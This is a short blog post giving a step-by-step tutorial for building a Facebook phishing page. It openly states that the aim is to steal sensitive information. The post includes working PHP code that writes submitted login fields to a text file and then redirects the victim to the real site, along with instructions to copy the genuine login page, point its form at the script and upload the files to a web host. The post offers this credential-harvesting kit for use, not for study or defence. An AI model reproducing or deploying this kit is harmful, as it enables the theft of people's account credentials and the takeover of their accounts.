hi friends
abhilash here
in this post i will show you how to make you own pishing page
as everyone knows that pishing is the most popular and effective way to steal sensetive informations
so lets start
1.open the site of which you want to make you pishing page and copy paste
the source code by right click>view page source then save it in notepad with
extension "facebooklogin.html" or "facebooklogin.htm" without quotes
2.then go to notepad and copy paste the following codes and save it as
"xyz.php" without qoutes or you can give any name with extension .php and
create a new text file
<?php
header("Location: http://www.facebook.com/");
$handle = fopen("name of the text file", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
inthis case i have given it apple.txt
so the code became
<?php header("Location: http://www.facebook.com/"); $handle = fopen("apple.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
3.now open the "facebooklogin.html" with notepad and find action
by going to edit>find
then replace the login link with the "xyz.php" file
4.now you got three files
"facebooklogin.html"
"xyz.php"
"apple.txt"
now you can upload this files in a web hosting site and do your work
hope you all likeed this post feel free to comment anonymous comments are allowed
video tutorial coming soon
No comments:
Post a Comment